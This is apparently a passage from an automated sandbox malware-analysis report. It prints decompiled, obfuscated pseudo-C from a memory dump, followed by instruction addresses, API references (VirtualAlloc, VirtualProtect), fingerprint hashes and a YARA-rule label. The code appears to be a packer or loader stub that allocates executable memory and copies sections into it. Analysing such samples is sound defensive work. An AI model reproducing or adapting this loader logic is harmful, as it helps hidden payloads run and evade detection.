					 *_t1143 = _t979;
					_t403 = _t824 + 0x41cb46; // 0x41cb46
					 *_t1143 =  *_t1143 & 0x00000000;
					 *_t1143 =  *_t1143 + _t403;
					_t404 = _t824 + 0x41c91c; // 0x41c91c
					 *_t1143 = _t404;
					_t767 =  *((intOrPtr*)(_t824 + 0x41f068))(_v20, _t824, _v16, _t979);
					 *_t1143 = _t1081;
					 *(_t824 + 0x41cf40) = 0 ^ _t767;
					_t1097 = 0;
					_t981 =  *_t1143;
					_t1144 =  &(_t1143[1]);
					_pop( *_t408);
					 *_t1144 =  *_t1144 & 0x00000000;
					 *_t1144 =  *_t1144 + (0 ^ _v20);
					 *_t1144 = _t981;
					_t411 = _t824 + 0x41cc6e; // 0x41cc6e
					 *_t1144 = _t411;
					_t771 =  *((intOrPtr*)(_t824 + 0x41f060))(_v16, _v16, _t916);
					 *(_t824 + 0x41c082) =  *(_t824 + 0x41c082) & 0x00000000;
					 *(_t824 + 0x41c082) =  *(_t824 + 0x41c082) ^ _t981 & 0x00000000 ^ _t771;
					 *_t418 = _t981;
					_t986 = _v12;
					 *_t1144 = 2;
					_v12 = _v12 & 0x00000000;
					 *_t1144 =  *_t1144 ^ _t986;
					_t423 = _t824 + 0x41cfff; // 0x41cfff
					 *_t1144 =  *_t1144 & 0x00000000;
					 *_t1144 =  *_t1144 ^ _t423;
					_t773 =  *((intOrPtr*)(_t824 + 0x41f060))(_t1112, _v12, _t824);
					 *_t1144 =  *_t1144 & 0x00000000;
					 *_t1144 =  *_t1144 + _t773;
					_t425 = _t824 + 0x41c3b9; // 0x41c3b9
					 *_t1144 =  *_t1144 - _t1112;
					 *_t1144 =  *_t1144 | _t425;
					_t775 =  *((intOrPtr*)(_t824 + 0x41f060))(_t1112, _t986);
					_t1132 =  &(_t1144[1]);
					 *_t427 = _t775;
					_v20 = _v20 + (_t916 & 0x00000000 |  *_t1144);
					_push(_v20);
					_pop(_t776);
					_t1054 = _t1052;
					 *_t1132 = _t1054;
					_t879 =  *(_t824 + 0x41d0fa);
					_t1057 = 0;
					if(_t879 > _t776) {
						_t432 = _t824 + 0x41cfff; // 0x41cfff
						 *_t1132 =  *_t1132 - _t1112;
						 *_t1132 =  *_t1132 + _t432;
						_t433 = _t824 + 0x41c3b9; // 0x41c3b9
						 *_t1132 =  *_t1132 ^ _t1112;
						 *_t1132 =  *_t1132 + _t433;
						_t788 =  *((intOrPtr*)(_t824 + 0x41f064))(_t1112, _t1112);
						_v12 = _t1097;
						 *((intOrPtr*)(_t824 + 0x41d019)) = _t788;
						_t1097 = _v12;
					}
					_pop( *_t438);
					_t987 = _v12;
					 *_t1132 =  *_t1132 ^ _t824;
					 *_t1132 = _t987;
					_t440 = _t824 + 0x41c42d; // 0x41c42d
					 *_t1132 =  *_t1132 - _t1097;
					 *_t1132 =  *_t1132 + _t440;
					_t778 =  *((intOrPtr*)(_t824 + 0x41f060))(_t1097, _t824);
					 *_t1132 = _t1057;
					 *((intOrPtr*)(_t824 + 0x41c664)) = _t778;
					_t1060 = 0;
					_v16 = _v16 & 0x00000000;
					 *_t1132 =  *_t1132 + _t1060;
					_t446 = _t824 + 0x41c4b9; // 0x41c4b9
					_v12 = 0;
					 *_t1132 =  *_t1132 + _t446;
					_t449 = _t824 + 0x41c298; // 0x41c298
					 *_t1132 =  *_t1132 ^ _t1097;
					 *_t1132 = _t449;
					_t781 =  *((intOrPtr*)(_t824 + 0x41f068))();
					_v16 = _t987;
					 *(_t824 + 0x41c405) = 0 ^ _t781;
					_t947 = _v16;
					VirtualProtect(_t1097, _v12, _v16, ??);
					_t455 = _t824 + 0x41c772; // 0x41c772
					_v20 = 0;
					 *_t1132 =  *_t1132 ^ _t455;
					_t458 = _t824 + 0x41cb5c; // 0x41cb5c
					 *_t1132 =  *_t1132 ^ _t824;
					 *_t1132 =  *_t1132 | _t458;
					_t785 =  *((intOrPtr*)(_t824 + 0x41f068))(_t824, _v20);
					_v12 = _t1060;
					 *(_t824 + 0x41c6c0) =  *(_t824 + 0x41c6c0) & 0x00000000;
					 *(_t824 + 0x41c6c0) =  *(_t824 + 0x41c6c0) | _t1060 - _v12 ^ _t785;
					_t1023 = _v12;
				}
				_pop( *_t467);
				_v16 = 0;
				 *_t1132 =  *_t1132 + _t824 + 0x41d305;
				 *_t1132 =  *_t1132 ^ _t879;
				 *_t1132 =  *_t1132 | _t824 + 0x0041cf53;
				_t701 =  *((intOrPtr*)(_t824 + 0x41f068))(_t879, _v16);
				_v16 = _t947;
				 *(_t824 + 0x41c775) = 0 ^ _t701;
				_t950 = _v16;
				_t1026 = (_t1023 & 0x00000000 | _v12) + 0xf8;
				_t827 = _t824;
				_v20 = 0;
				 *_t1132 =  *_t1132 ^ _t827 + 0x0041d2fb;
				_v16 = _v16 & 0x00000000;
				 *_t1132 =  *_t1132 + _t827 + 0x41c2ea;
				_push( *((intOrPtr*)(_t827 + 0x41f068))(_v16, _v20));
				_pop( *_t485);
				_push(_v12);
				_pop( *_t487);
				do {
					 *_t1132 = _t1026;
					 *_t1132 =  *_t1132 ^ _t879;
					 *_t1132 =  *_t1132 ^ _t827 + 0x0041c966;
					_t706 =  *((intOrPtr*)(_t827 + 0x41f060))(_t879, _v16);
					_v20 = _v20 & 0x00000000;
					 *_t1132 =  *_t1132 | _t706;
					 *_t1132 = _t827 + 0x41ca40;
					_t708 =  *((intOrPtr*)(_t827 + 0x41f060))(_v20, _v20);
					_t1133 = _t1132 - 0xfffffffc;
					 *_t497 = _t708;
					_v12 = _v12 + (_t879 & 0x00000000) +  *_t1132;
					_push(_v12);
					_pop(_t709);
					_t1028 = _t1026;
					_v16 = _t950;
					_t882 = 0 ^  *(_t827 + 0x41d332);
					_t953 = _v16;
					if(_t882 > _t709) {
						 *_t1133 =  *_t1133 ^ _t1112;
						 *_t1133 = _t827 + 0x41c966;
						 *_t1133 =  *_t1133 & 0x00000000;
						 *_t1133 =  *_t1133 | _t827 + 0x0041ca40;
						_t709 =  *((intOrPtr*)(_t827 + 0x41f064))(_t882, _t1112);
					}
					 *_t1133 = _t882;
					 *((intOrPtr*)(_t827 + 0x41c6bc)) = _t709;
					_v20 = _t1028;
					_t1031 = _v20;
					_v20 = _v20 & 0x00000000;
					 *_t1133 =  *_t1133 + _t827 + 0x41c5f7;
					_t711 =  *((intOrPtr*)(_t827 + 0x41f060))(_v20, 0);
					 *_t1133 = _t711;
					_v16 = _v16 & 0x00000000;
					 *_t1133 =  *_t1133 | _t827 + 0x0041c637;
					_t713 =  *((intOrPtr*)(_t827 + 0x41f060))(_v16, _v12);
					_t1134 =  &(_t1133[1]);
					_v20 = _a4;
					_push( *_t1133 + _t713);
					_t1085 = _v20;
					_pop(_t714);
					_push( *((intOrPtr*)(_t827 + 0x41cece)));
					_pop( *_t525);
					_push(_v20);
					_pop(_t888);
					if(_t888 > _t714) {
						 *_t1134 =  *_t1134 - _t888;
						 *_t1134 =  *_t1134 ^ _t827 + 0x0041c5f7;
						_v20 = _v20 & 0x00000000;
						 *_t1134 =  *_t1134 | _t827 + 0x0041c637;
						_t714 =  *((intOrPtr*)(_t827 + 0x41f064))(_v20, _t888);
					}
					_v12 = _t1085;
					 *(_t827 + 0x41c10a) =  *(_t827 + 0x41c10a) & 0x00000000;
					 *(_t827 + 0x41c10a) =  *(_t827 + 0x41c10a) | _t1085 ^ _v12 | _t714;
					 *_t1134 = _t1112;
					_t889 = 0 ^  *(_t1031 + 0x10);
					_t1112 = 0;
					 *_t1134 =  *_t1134 & 0x00000000;
					 *_t1134 =  *_t1134 ^ _t889;
					_v20 = 0;
					 *_t1134 =  *_t1134 ^ _t827 + 0x0041cee6;
					 *_t1134 =  *_t1134 ^ _t1112;
					 *_t1134 =  *_t1134 + _t827 + 0x41c9b9;
					_t717 =  *((intOrPtr*)(_t827 + 0x41f068))(_v20, _t714);
					_v20 = _t1031;
					 *(_t827 + 0x41cb03) =  *(_t827 + 0x41cb03) & 0x00000000;
					 *(_t827 + 0x41cb03) =  *(_t827 + 0x41cb03) ^ (_t1031 & 0x00000000 | _t717);
					_t1034 = _v20;
					 *_t552 = _t1112;
					_push(_v12);
					_pop( *_t555);
					_v16 = _v16 +  *((intOrPtr*)(_t1034 + 0x14));
					_push(_v16);
					_pop(_t1089);
					_t955 = _t953;
					_v16 = 0;
					 *_t1134 =  *_t1134 ^ _t889 & 0x00000000 ^ _v20;
					 *_t1134 =  *_t1134 & 0x00000000;
					 *_t1134 =  *_t1134 + _t827 + 0x41c452;
					_v12 = 0;
					 *_t1134 =  *_t1134 ^ _t827 + 0x0041c156;
					_t720 =  *((intOrPtr*)(_t827 + 0x41f068))(_v12, _t955, _v16);
					 *_t1134 = _t955;
					 *((intOrPtr*)(_t827 + 0x41c66c)) = _t720;
					_t958 = 0;
					_pop( *_t567);
					_t893 = _v16;
					_t1035 =  *(_t1034 + 0xc);
					 *_t1134 =  *_t1134 & 0x00000000;
					 *_t1134 =  *_t1134 + _t893;
					 *_t1134 =  *_t1134 - _t1112;
					 *_t1134 = _t827 + 0x41c5a4;
					_t722 =  *((intOrPtr*)(_t827 + 0x41f060))(_t1112, _t1089);
					 *_t1134 =  *_t1134 - _t1112;
					 *_t1134 =  *_t1134 ^ _t722;
					 *_t1134 =  *_t1134 ^ _t1035;
					 *_t1134 =  *_t1134 + _t827 + 0x41ce5b;
					_t724 =  *((intOrPtr*)(_t827 + 0x41f060))(_t1112);
					 *_t574 = _t1035;
					 *_t1134 =  *_t1134 + _t827;
					_t828 = _t724;
					_t827 = 0;
					_push( *((intOrPtr*)(_t827 + 0x41d348)));
					_pop( *_t577);
					_push(_v12);
					_pop(_t896);
					if(_t896 > _t828 + (_t893 & 0x00000000 ^ _v20)) {
						_t579 = _t827 + 0x41c5a4; // 0x41c5a4
						 *_t1134 =  *_t1134 ^ _t958;
						 *_t1134 =  *_t1134 | _t579;
						_t580 = _t827 + 0x41ce5b; // 0x41ce5b
						 *_t1134 =  *_t1134 - _t896;
						 *_t1134 =  *_t1134 | _t580;
						_t733 =  *((intOrPtr*)(_t827 + 0x41f064))(_t896, _t958);
						_v20 = _t1089;
						 *(_t827 + 0x41c50f) = 0 ^ _t733;
						_t1089 = _v20;
					}
					_v12 = _t958;
					_t1036 =  *(_t827 + 0x41c166) + _t1035;
					_t726 = memcpy(_t1036, _t1089, (_t896 & 0x00000000) +  *_t1134);
					_t1136 =  &(_t1134[4]);
					_t879 = 0;
					_t1132 = _t1136 - 0xfffffffc;
					_push(_v12);
					_t1026 =  *_t1136 + 0x28;
					_pop(_t950);
					_t588 =  &_v8;
					 *_t588 = _v8 - 1;
				} while ( *_t588 != 0);
				_pop( *_t590);
				_t1041 = _v16;
				_push(_t1112);
				 *_t594 = _t726 & 0x00000000 ^ _t1112 -  *_t1132 ^  *(_t1041 + 0x28);
				_v20 = _v20 +  *(_t827 + 0x41c166);
				_push(_v20);
				_pop(_t729);
				_t1043 = _t1041;
				 *_t1132 = _t950;
				 *((intOrPtr*)(_t827 + 0x41d140)) = _t729;
				_t966 = 0;
				_v12 = 0;
				_t1091 = _t1089 & 0x00000000 | 0 ^  *(_t827 + 0x41c166);
				_t901 = _v12;
				if(_t1091 > 0) {
					 *_t1132 =  *_t1132 & 0x00000000;
					 *_t1132 =  *_t1132 + _t1091;
					_t730 = E00EE4E1A(_t827, _t901, _t966, _t1043, _t1091, _t827);
					 *_t1132 = _t1091;
					_t729 = E00EE2FAF(_t730, _t827, _t901, _t966, _t1043, _t1091, _v12);
				}
				_pop( *_t603);
				return _t729;
			}

0x00ee5f16
0x00ee5f16
0x00ee5f16
0x00ee5f17
0x00ee5f1b
0x00ee5f1e
0x00ee5f20
0x00ee5f23
0x00ee5f24
0x00ee5f28
0x00ee5f2b
0x00ee5f2c
0x00ee5f30
0x00ee5f39
0x00ee5f3a
0x00ee5f3d
0x00ee5f46
0x00ee5f4a
0x00ee5f4d
0x00ee5f56
0x00ee5f57
0x00ee5f5a
0x00ee5f5d
0x00ee5f63
0x00ee5f66
0x00ee5f6e
0x00ee5f71
0x00ee5f72
0x00ee5f75
0x00ee5f78
0x00ee5f7b
0x00ee5f84
0x00ee5f85
0x00ee5f88
0x00ee5f8b
0x00ee5f91
0x00ee5f94
0x00ee5f9d
0x00ee5f9e
0x00ee5fa2
0x00ee5fa5
0x00ee5fab
0x00ee5fb1
0x00ee5fb5
0x00ee5fb8
0x00ee5fbb
0x00ee5fbe
0x00ee5fc0
0x00ee5fcb
0x00ee5fd2
0x00ee5fda
0x00ee5fdd
0x00ee5fe6
0x00ee5fe7
0x00ee5fea
0x00ee5ff3
0x00ee5ff4
0x00ee5ff7
0x00ee5ffa
0x00ee5ffa
0x00ee6002
0x00ee6005
0x00ee6009
0x00ee600d
0x00ee6017
0x00ee601b
0x00ee6025
0x00ee6029
0x00ee602c
0x00ee6032
0x00ee6039
0x00ee604b
0x00ee6054
0x00ee605e
0x00ee6067
0x00ee6068
0x00ee606b
0x00ee606e
0x00ee6074
0x00ee607b
0x00ee607e
0x00ee6088
0x00ee608b
0x00ee6094
0x00ee6095
0x00ee6098
0x00ee609b
0x00ee60a1
0x00ee60a7
0x00ee60ae
0x00ee60b7
0x00ee60be
0x00ee60c1
0x00ee60c8
0x00ee60cb
0x00ee60d4
0x00ee60db
0x00ee60de
0x00ee60e4
0x00ee60e7
0x00ee60ee
0x00ee60f1
0x00ee60f4
0x00ee60f7
0x00ee60f8
0x00ee6106
0x00ee6108
0x00ee610b
0x00ee6114
0x00ee6118
0x00ee6124
0x00ee6127
0x00ee612d
0x00ee6133
0x00ee613a
0x00ee6140
0x00ee6147
0x00ee614a
0x00ee614f
0x00ee6156
0x00ee615c
0x00ee615f
0x00ee6162
0x00ee616b
0x00ee616e
0x00ee6172
0x00ee6176
0x00ee617a
0x00ee617e
0x00ee6188
0x00ee618c
0x00ee6195
0x00ee619c
0x00ee619f
0x00ee61ab
0x00ee61b2
0x00ee61be
0x00ee61c1
0x00ee61c8
0x00ee61d1
0x00ee61db
0x00ee61de
0x00ee61e5
0x00ee61e8
0x00ee61f1
0x00ee61fb
0x00ee61fe
0x00ee6206
0x00ee6209
0x00ee6210
0x00ee6213
0x00ee6216
0x00ee6219
0x00ee621a
0x00ee621b
0x00ee6231
0x00ee6239
0x00ee6240
0x00ee6249
0x00ee6253
0x00ee6256
0x00ee6256
0x00ee625e
0x00ee6265
0x00ee626b
0x00ee626c
0x00ee6276
0x00ee6279
0x00ee6283
0x00ee628c
0x00ee6296
0x00ee6299
0x00ee629f
0x00ee62a9
0x00ee62b5
0x00ee62b8
0x00ee62c3
0x00ee62c6
0x00ee62cd
0x00ee62ce
0x00ee62d1
0x00ee62d2
0x00ee62dd
0x00ee62df
0x00ee62e4
0x00ee62ec
0x00ee62f6
0x00ee6300
0x00ee6303
0x00ee6306
0x00ee630c
0x00ee6314
0x00ee631b
0x00ee6321
0x00ee6321
0x00ee632a
0x00ee632d
0x00ee6335
0x00ee6338
0x00ee633b
0x00ee633e
0x00ee633f
0x00ee6343
0x00ee634d
0x00ee6351
0x00ee635d
0x00ee6360
0x00ee6368
0x00ee636f
0x00ee6375
0x00ee637c
0x00ee637f
0x00ee6385
0x00ee6389
0x00ee638c
0x00ee6396
0x00ee6399
0x00ee63a2
0x00ee63a9
0x00ee63ac
0x00ee63b4
0x00ee63bb
0x00ee63c1
0x00ee63c7
0x00ee63ca
0x00ee63d1
0x00ee63d3
0x00ee63dc
0x00ee63e6
0x00ee63e9
0x00ee63f0
0x00ee63f3
0x00ee63fd
0x00ee6400
0x00ee6403
0x00ee6412
0x00ee6417
0x00ee641b
0x00ee641e
0x00ee6420
0x00ee6421
0x00ee642c
0x00ee642e
0x00ee6433
0x00ee643c
0x00ee643f
0x00ee6448
0x00ee6452
0x00ee6455
0x00ee6455
0x00ee6461
0x00ee6468
0x00ee646e
0x00ee6474
0x00ee6477
0x00ee6483
0x00ee6486
0x00ee648c
0x00ee6494
0x00ee649b
0x00ee64a1
0x00ee64a6
0x00ee64b2
0x00ee64b6
0x00ee64b9
0x00ee64c1
0x00ee64c5
0x00ee64c8
0x00ee64d4
0x00ee64db
0x00ee64e1
0x00ee64e3
0x00ee64e6
0x00ee64f2
0x00ee64f5
0x00ee64fe
0x00ee650a
0x00ee650d
0x00ee6515
0x00ee6518
0x00ee651f
0x00ee6522
0x00ee6525
0x00ee6528
0x00ee6529
0x00ee6537
0x00ee6539
0x00ee653c
0x00ee653e
0x00ee6544
0x00ee654e
0x00ee6551
0x00ee6558
0x00ee655c
0x00ee655f
0x00ee655f
0x00ee6567
0x00ee656e
0x00ee6574
0x00ee6575
0x00ee6586
0x00ee6590
0x00ee6593
0x00ee659a
0x00ee659e
0x00ee65a1
0x00ee65a9
0x00ee65b0
0x00ee65b6
0x00ee65b7
0x00ee65ca
0x00ee65cc
0x00ee65ce
0x00ee65d2
0x00ee65d5
0x00ee65db
0x00ee65e5
0x00ee65e8
0x00ee65ee
0x00ee65f6
0x00ee65fd
0x00ee6603
0x00ee660b
0x00ee6610
0x00ee6618
0x00ee661b
0x00ee6622
0x00ee6625
0x00ee662b
0x00ee6632
0x00ee6635
0x00ee663c
0x00ee6640
0x00ee6643
0x00ee664a
0x00ee664e
0x00ee6651
0x00ee6659
0x00ee665f
0x00ee6666
0x00ee6667
0x00ee666a
0x00ee666b
0x00ee6671
0x00ee6674
0x00ee6677
0x00ee667a
0x00ee6685
0x00ee668f
0x00ee6693
0x00ee6696
0x00ee669d
0x00ee66a0
0x00ee66a3
0x00ee66a3
0x00ee66a9
0x00ee66ac
0x00ee66af
0x00ee66c2
0x00ee66c6
0x00ee66c9
0x00ee66d2
0x00ee66dc
0x00ee66e8
0x00ee66eb
0x00ee66f1
0x00ee66f8
0x00ee66fe
0x00ee6703
0x00ee6706
0x00ee670b
0x00ee670e
0x00ee6713
0x00ee671a
0x00ee671d
0x00ee6720
0x00ee6727
0x00ee6730
0x00ee673a
0x00ee673d
0x00ee6743
0x00ee674d
0x00ee6757
0x00ee675b
0x00ee675e
0x00ee676d
0x00ee6774
0x00ee6777
0x00ee677a
0x00ee677d
0x00ee677e
0x00ee677f
0x00ee6781
0x00ee678c
0x00ee6791
0x00ee679a
0x00ee679d
0x00ee67a7
0x00ee67ab
0x00ee67ae
0x00ee67b4
0x00ee67b6
0x00ee67bd
0x00ee67c3
0x00ee67c4
0x00ee67c7
0x00ee67cc
0x00ee67cf
0x00ee67d2
0x00ee67d2
0x00ee67d3
0x00ee67dd
0x00ee67e0
0x00ee67e7
0x00ee67f1
0x00ee67f4
0x00ee67f7
0x00ee67fe
0x00ee6801
0x00ee680b
0x00ee680f
0x00ee6812
0x00ee681d
0x00ee6824
0x00ee6827
0x00ee682a
0x00ee682d
0x00ee682e
0x00ee682f
0x00ee6841
0x00ee684c
0x00ee6858
0x00ee685b
0x00ee6861
0x00ee6868
0x00ee686e
0x00ee6873
0x00ee6876
0x00ee687e
0x00ee6881
0x00ee6881
0x00ee6889
0x00ee688d
0x00ee6897
0x00ee689b
0x00ee68a4
0x00ee68ae
0x00ee68b1
0x00ee68bd
0x00ee68c4
0x00ee68cd
0x00ee68d0
0x00ee68d3
0x00ee68e0
0x00ee68e4
0x00ee68e7
0x00ee68f0
0x00ee68f7
0x00ee6900
0x00ee6901
0x00ee6904
0x00ee6907
0x00ee6913
0x00ee6916
0x00ee6919
0x00ee6926
0x00ee692f
0x00ee6939
0x00ee693c
0x00ee6945
0x00ee6951
0x00ee6954
0x00ee6960
0x00ee6968
0x00ee696c
0x00ee6971
0x00ee6972
0x00ee697d
0x00ee697f
0x00ee6984
0x00ee6986
0x00ee698d
0x00ee6990
0x00ee6993
0x00ee699a
0x00ee699d
0x00ee69a0
0x00ee69a6
0x00ee69ae
0x00ee69b5
0x00ee69bb
0x00ee69c0
0x00ee69c3
0x00ee69c6
0x00ee69cd
0x00ee69d0
0x00ee69d6
0x00ee69d9
0x00ee69e0
0x00ee69e4
0x00ee69e7
0x00ee69f0
0x00ee69f3
0x00ee69fb
0x00ee6a02
0x00ee6a08
0x00ee6a0b
0x00ee6a0e
0x00ee6a13
0x00ee6a1a
0x00ee6a1e
0x00ee6a24
0x00ee6a27
0x00ee6a30
0x00ee6a33
0x00ee6a3f
0x00ee6a46
0x00ee6a4f
0x00ee6a52
0x00ee6a56
0x00ee6a5d
0x00ee6a64
0x00ee6a67
0x00ee6a6e
0x00ee6a72
0x00ee6a75
0x00ee6a7c
0x00ee6a80
0x00ee6a83
0x00ee6a8a
0x00ee6a8d
0x00ee6a90
0x00ee6a9f
0x00ee6aa6
0x00ee6aa9
0x00ee6aac
0x00ee6aaf
0x00ee6ab0
0x00ee6ab3
0x00ee6abe
0x00ee6ac0
0x00ee6ac3
0x00ee6ac5
0x00ee6acc
0x00ee6acf
0x00ee6ad2
0x00ee6ad9
0x00ee6adc
0x00ee6adf
0x00ee6ae5
0x00ee6aec
0x00ee6af2
0x00ee6af2
0x00ee6af5
0x00ee6af8
0x00ee6afc
0x00ee6aff
0x00ee6b02
0x00ee6b09
0x00ee6b0c
0x00ee6b0f
0x00ee6b17
0x00ee6b1e
0x00ee6b24
0x00ee6b25
0x00ee6b2c
0x00ee6b2f
0x00ee6b35
0x00ee6b3f
0x00ee6b42
0x00ee6b49
0x00ee6b4c
0x00ee6b4f
0x00ee6b55
0x00ee6b5c
0x00ee6b62
0x00ee6b65
0x00ee6b6b
0x00ee6b71
0x00ee6b7b
0x00ee6b7e
0x00ee6b85
0x00ee6b88
0x00ee6b8b
0x00ee6b91
0x00ee6b99
0x00ee6ba0
0x00ee6ba6
0x00ee6ba6
0x00ee6baf
0x00ee6bbb
0x00ee6bc5
0x00ee6bcf
0x00ee6bd2
0x00ee6bd5
0x00ee6bdb
0x00ee6be2
0x00ee6be8
0x00ee6bf4
0x00ee6bf6
0x00ee6bfd
0x00ee6c07
0x00ee6c10
0x00ee6c17
0x00ee6c20
0x00ee6c21
0x00ee6c24
0x00ee6c27
0x00ee6c2d
0x00ee6c30
0x00ee6c3a
0x00ee6c3d
0x00ee6c40
0x00ee6c46
0x00ee6c4d
0x00ee6c59
0x00ee6c5c
0x00ee6c6b
0x00ee6c72
0x00ee6c75
0x00ee6c78
0x00ee6c7b
0x00ee6c7c
0x00ee6c7d
0x00ee6c88
0x00ee6c8a
0x00ee6c8f
0x00ee6c98
0x00ee6c9b
0x00ee6ca5
0x00ee6ca9
0x00ee6cac
0x00ee6cac
0x00ee6cb4
0x00ee6cbb
0x00ee6cc2
0x00ee6ccc
0x00ee6cd5
0x00ee6cdc
0x00ee6cdf
0x00ee6ce8
0x00ee6cf1
0x00ee6cf8
0x00ee6cfb
0x00ee6d06
0x00ee6d09
0x00ee6d10
0x00ee6d11
0x00ee6d14
0x00ee6d15
0x00ee6d1b
0x00ee6d1e
0x00ee6d21
0x00ee6d24
0x00ee6d2d
0x00ee6d30
0x00ee6d39
0x00ee6d40
0x00ee6d43
0x00ee6d43
0x00ee6d49
0x00ee6d51
0x00ee6d58
0x00ee6d63
0x00ee6d6b
0x00ee6d6d
0x00ee6d6f
0x00ee6d73
0x00ee6d7c
0x00ee6d86
0x00ee6d90
0x00ee6d93
0x00ee6d96
0x00ee6d9c
0x00ee6da4
0x00ee6dab
0x00ee6db1
0x00ee6dba
0x00ee6dc4
0x00ee6dc5
0x00ee6dc8
0x00ee6dcb
0x00ee6dce
0x00ee6dcf
0x00ee6dd0
0x00ee6dda
0x00ee6de4
0x00ee6de8
0x00ee6df1
0x00ee6dfb
0x00ee6dfe
0x00ee6e06
0x00ee6e0d
0x00ee6e13
0x00ee6e16
0x00ee6e19
0x00ee6e1c
0x00ee6e20
0x00ee6e24
0x00ee6e2e
0x00ee6e31
0x00ee6e34
0x00ee6e3b
0x00ee6e3e
0x00ee6e48
0x00ee6e4b
0x00ee6e4e
0x00ee6e5a
0x00ee6e62
0x00ee6e66
0x00ee6e6b
0x00ee6e6c
0x00ee6e72
0x00ee6e75
0x00ee6e78
0x00ee6e7b
0x00ee6e7d
0x00ee6e84
0x00ee6e87
0x00ee6e8a
0x00ee6e91
0x00ee6e94
0x00ee6e97
0x00ee6e9d
0x00ee6ea4
0x00ee6eaa
0x00ee6eaa
0x00ee6eb9
0x00ee6ec8
0x00ee6ec9
0x00ee6ec9
0x00ee6ec9
0x00ee6ed4
0x00ee6ed7
0x00ee6ee0
0x00ee6ee2
0x00ee6ee3
0x00ee6ee3
0x00ee6ee3
0x00ee6eec
0x00ee6eef
0x00ee6ef2
0x00ee6f07
0x00ee6f0a
0x00ee6f0d
0x00ee6f10
0x00ee6f11
0x00ee6f14
0x00ee6f1b
0x00ee6f21
0x00ee6f22
0x00ee6f31
0x00ee6f33
0x00ee6f39
0x00ee6f3c
0x00ee6f40
0x00ee6f43
0x00ee6f4b
0x00ee6f4e
0x00ee6f4e
0x00ee6f61
0x00ee6f68

APIs

VirtualProtect.KERNELBASE ref: 00EE6B65

Memory Dump Source

Source File: 00000002.00000002.257292847.0000000000EE0000.00000040.00000001.sdmp, Offset: 00EE0000, based on PE: true

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 8a008023e028c667d7368bc90691588549f831ea45597d08e0b089263ec99f3d
Instruction ID: f13bc54f7a154b96f71ca5006fd3cb8cf6574691516cfb89920cc47d190fe3c3
Opcode Fuzzy Hash: 8a008023e028c667d7368bc90691588549f831ea45597d08e0b089263ec99f3d
Instruction Fuzzy Hash: FDC22572844608EFEB049FA0C8C97EEBBF5FF48320F0589ADD899AA145D7345264CF59

Uniqueness

Uniqueness Score: -1.00%

Function 00EE709D, Relevance: 3.1, APIs: 2, Instructions: 115
memoryCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E00EE709D(signed int __ebx, long __ecx, void* __edx, void* __edi, long __esi, void* __eflags) {
				void* _t47;
				signed int _t48;
				signed int _t49;
				void* _t51;
				void* _t52;
				void* _t54;
				void* _t55;
				signed int _t59;
				long _t60;
				void* _t62;
				void* _t65;
				void* _t67;
				signed int _t68;
				void* _t72;
				signed int _t75;
				signed int _t78;
				void* _t81;
				signed int _t82;
				long _t87;
				signed int _t89;
				long _t94;
				void* _t97;
				void* _t99;
				long _t101;
				void* _t102;

				_t87 = __esi;
				_t79 = __edi;
				_t72 = __edx;
				_t59 = __ebx;
				 *_t101 = 0xffff0000;
				_t48 = E00EE2D42(_t47, __ebx, __ecx, __edx, __edi, __esi, __edi);
				 *_t101 =  *_t101 | _t59;
				_t60 = _t59;
				if( *_t101 != 0) {
					 *_t101 =  *_t101 + 4;
					 *_t101 =  *_t101 - _t94;
					 *_t101 =  *_t101 + 0x1000;
					 *_t101 =  *_t101 - _t60;
					 *_t101 =  *((intOrPtr*)(_t60 + 0x41c22f));
					_t48 = VirtualAlloc(0, __ecx, _t60, _t94);
				}
				 *(_t94 - 8) = 0;
				_push( *(_t94 - 8));
				 *_t101 =  *_t101 ^ _t48;
				_pop( *_t6);
				 *(_t60 + 0x41c60a) = 2;
				 *_t101 = _t94;
				 *(_t60 + 0x41d10e) = _t48;
				_t97 = 0;
				if( *(_t60 + 0x41c166) > 0) {
					_t55 = _t60 + 0x41c60a;
					 *(_t97 - 4) =  *(_t97 - 4) & 0x00000000;
					 *_t101 = _t55 +  *_t101;
					 *_t101 = 0x40;
					_t87 =  *_t101;
					 *_t101 =  *((intOrPtr*)(_t60 + 0x41c627));
					 *_t101 =  *(_t60 + 0x41c166);
					VirtualProtect(_t55, _t87, _t101,  *(_t97 - 4));
				}
				_push(_t72);
				 *((intOrPtr*)(_t101 + 4)) =  *((intOrPtr*)(_t60 + 0x41c3f9));
				_t89 = _t87;
				_push(_t72);
				 *((intOrPtr*)(_t101 + 4)) =  *((intOrPtr*)(_t60 + 0x41ceca));
				_t99 = _t97;
				_t49 = E00EE746C(_t60, _t72, _t79, _t89);
				_push( *((intOrPtr*)(_t60 + 0x41c627)));
				_pop( *_t24);
				_push( *(_t99 - 8));
				_pop(_t62);
				 *_t101 = _t62;
				_t65 = 0;
				_t67 = 0 ^  *(_t60 + 0x41c166) | 0 ^  *(_t60 + 0x41c166);
				_t81 = _t67;
				_t68 = _t65;
				if(_t67 != 0) {
					 *(_t99 - 8) = 0;
					 *_t101 =  *_t101 ^ _t81;
					_t49 = E00EE2A69(_t49, _t60, _t68, _t72, _t81, _t89,  *(_t99 - 8));
				}
				_t75 = _t72;
				_t51 = memset(_t81, _t49 ^ _t49, _t68 << 0);
				_t102 = _t101 + 0xc;
				_t82 = _t81 + _t68;
				if( *((intOrPtr*)(_t60 + 0x41c3f9)) != _t60) {
					_push(0);
					 *((intOrPtr*)(_t102 + 4)) =  *((intOrPtr*)(_t60 + 0x41c3f9));
					_t82 = _t82; // executed
					_t52 = E00EE5F16(_t51, _t60, 0, _t75, _t89); // executed
					_push(_t52);
					 *((intOrPtr*)(_t102 + 4)) =  *((intOrPtr*)(_t60 + 0x41c3f9));
					_t54 = _t52;
					_t51 = E00EE8F3B(_t54, _t60, 0, _t75, _t82, _t89);
				}
				 *(_t99 - 4) = _t82;
				 *(_t102 + 0x14) = _t75 & 0x00000000 | _t82 ^  *(_t99 - 4) |  *(_t60 + 0x41d140);
				 *_t41 =  *(_t60 + 0x41d140);
				_t78 =  *(_t99 - 8);
				_push(_t89);
				 *(_t99 + 4) =  *(_t99 + 4) & 0x00000000;
				 *(_t99 + 4) =  *(_t99 + 4) ^ _t89 & 0x00000000 ^ _t78;
				asm("popad");
				return _t51;
			}

0x00ee709d
0x00ee709d
0x00ee709d
0x00ee709d
0x00ee709e
0x00ee70a5
0x00ee70ab
0x00ee70ae
0x00ee70af
0x00ee70b2
0x00ee70b6
0x00ee70ba
0x00ee70c1
0x00ee70cb
